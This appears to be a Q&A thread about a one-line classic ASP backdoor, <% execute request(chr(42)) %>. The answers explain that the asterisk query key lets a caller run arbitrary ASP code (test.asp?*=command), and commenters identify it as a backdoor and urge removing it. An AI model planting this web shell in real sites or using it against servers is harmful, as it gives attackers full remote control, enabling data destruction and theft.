# What does Request("*") return in ASP classic

Tags: asp-classic

I came across some code that accesses `Request(chr(42))` (below) and executes it.

```
<% execute request(chr(42)) %>
```

I can't seem to find what '*' would return, as it doesn't seem like a valid `QueryString` variable name.

Comment: Some context would help - edit the body of your question to include an example or two.

Comment: The full code is <%execute request(chr(42)) %>. I suppose the context is an ASP backdoor.

Comment: @raindog Lol. that's all ?

Answer (score 3, accepted):

In classic ASP, you can call `Request("some_key")` and it will return the value of "some_key" of either the `Request.Querystring` (GET) or `Request.Form` (POST) data.

`chr(42)` is a valid key, so you can call the page with `test.asp?*=command` to execute something.

`execute` is a vbscript/asp function that lets you execute a string as ASP code, same as `eval`. [details](http://www.aspdev.org/asp/asp-eval-execute/)

> *before update (does not apply):*
>
> I only know of the [Server.Execute](http://msdn.microsoft.com/en-us/library/ms525849%28v=vs.90%29.aspx) method, which will execute some other ASP page.

All in all, it seems like some hack/backdoor as you suggested.

Comment: This is indeed a fully working backdoor that will execute the given raw string as if it was written in the page. Sending `Response.Write("hello world")` on the querystring will cause "hello world" to appear on the screen, and of course the user who knows of the backdoor can execute **any** ASP code, including wiping clean the server disk, delete the whole database etc. @Raindog if you read it - **GET RID OF THIS CODE ASAP**.

Comment: updated answer. @ShadowWizard: thanks, I really wasn't aware of this function anymore. Must have blocked it from my memory. :)

Comment: Thanks a bunch guys. @gpinkas answered the specific question I had, in that * is indeed a valid key for the QueryString. I thought perhaps it had special meaning.